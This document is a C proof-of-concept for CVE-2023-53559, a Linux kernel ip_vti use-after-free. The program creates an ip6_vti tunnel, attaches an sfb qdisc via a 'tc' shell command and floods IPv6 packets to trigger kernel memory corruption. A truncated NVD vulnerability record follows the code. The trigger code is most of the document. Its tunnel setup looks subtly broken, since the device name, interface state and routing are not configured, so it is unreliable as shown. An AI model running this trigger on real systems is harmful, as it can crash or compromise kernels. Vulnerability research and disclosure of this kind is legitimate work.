CVE-2023-53559

// CVE-2023-53559 PoC - Linux Kernel ip_vti slab-use-after-free // Trigger: Create ip_vti tunnel with sfb qdisc and send IPv6 packets #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/if.h> #include <linux/ip6_tunnel.h> #include <sys/ioctl.h> #include <arpa/inet.h> #include <fcntl.h> int main(int argc, char *argv[]) { int fd, tunnel_fd; struct ifreq ifr; struct ip6_tnl_parm2 p; // Step 1: Create an ip_vti6 tunnel device fd = socket(AF_INET6, SOCK_DGRAM, 0); if (fd < 0) { perror("socket"); return 1; } memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, "ip6_vti0", IFNAMSIZ - 1); memset(&p, 0, sizeof(p)); p.proto = IPPROTO_IPV6; // Configure tunnel parameters (local/remote addresses) inet_pton(AF_INET6, "fd00::1", &p.laddr); inet_pton(AF_INET6, "fd00::2", &p.raddr); ifr.ifr_ifru.ifru_data = (void *)&p; if (ioctl(fd, SIOCADDTUNNEL, &ifr) < 0) { perror("ioctl SIOCADDTUNNEL"); // Tunnel might already exist, try to use existing one } // Step 2: Set sfb qdisc on the tunnel device to trigger cb modification char cmd[256]; snprintf(cmd, sizeof(cmd), "tc qdisc add dev ip6_vti0 root sfb"); if (system(cmd) != 0) { fprintf(stderr, "Failed to set sfb qdisc\n"); } // Step 3: Send IPv6 packets through the tunnel to trigger UAF tunnel_fd = socket(AF_INET6, SOCK_DGRAM, 0); if (tunnel_fd < 0) { perror("socket tunnel"); return 1; } struct sockaddr_in6 dst; memset(&dst, 0, sizeof(dst)); dst.sin6_family = AF_INET6; inet_pton(AF_INET6, "fd00::2", &dst.sin6_addr); // Send multiple packets to trigger the slab-use-after-free for (int i = 0; i < 1000; i++) { char payload[64]; memset(payload, 'A' + (i % 26), sizeof(payload)); if (sendto(tunnel_fd, payload, sizeof(payload), 0, (struct sockaddr *)&dst, sizeof(dst)) < 0) { perror("sendto"); } } printf("PoC executed - check kernel logs for slab-use-after-free\n"); close(tunnel_fd); close(fd); return 0; }

{"cve": {"id": "CVE-2023-53559", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:51.280", "lastModified": "2026-03-21T01:01:22.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nip_vti: fix potential slab-use-after-free in decode_session6\n\nWhen ip_vti device is set to the qdisc of the sfb type, the cb field\nof the sent skb may be modified during enqueuing. Then,\nslab-use-after-free may occur when ip_vti device sends IPv6 packets.\nAs commit f855691975bb (\"xfrm6: Fix the nexthdr offset in\n_decode_session6.\") showed, xfrm_decode_session was originally intended\nonly for the receive path. IP6CB(skb)->nhoff is not set during\ntransmission. Therefore, set the cb field in the skb to 0 before\nsending packets."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.19.1", "versionEndExcluding": "4.14.324", "matchCriteriaId": "4371BCA6-0BDB-46C3-8352-15702F5E81A2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.293", "matchCriteriaId": "39603052-E341-4096-8535-38D44A60E845"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.255", "matchCriteriaId": "1379E40A-2AC3-484E-929A-7F46B6C3B521"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.192", "matchCriteriaId": "9396FFDC-6A0D-44B7-9368-21B456F6D4AE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.128", "matchCriteriaId": "1415629F-F97B-4880-BA1E-AF3DBB8EF305"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.47", "matchCriteriaId": "2EEA01B0-0151-4E0F-B140-1A441EEDD717"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.4.12", "matchCriteriaId": "CF8ECF64-40AE-49AB-8315-4D83F9F56ECF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.19:-:*:*:*:*:*:*", "matchCriteriaId": "8C54596F-5461-44C4-91FB-7453BE905748"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:3.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "5843CB48-122D-496D-B66D-35296BC0EFB1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": "E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc6:*:*:*:*:*:*", "matchCriteriaId": "5B1C14ED-ABC4-41D3-8D9C-D38C6A65B4DE"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/0b4d69539fdea138af2befe08893850c89248068", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/2b05bf5dc437f7891dd409a3eaf5058459391c7a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6018a266279b1a75143c7c0804dd08a5fc4c3e0b", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/78e397a43e1c47321a4679cc49a6c4530bf820b9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7dfe23659f3677c08a60a0056cda2d91a79c15ca", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stab ... (truncated)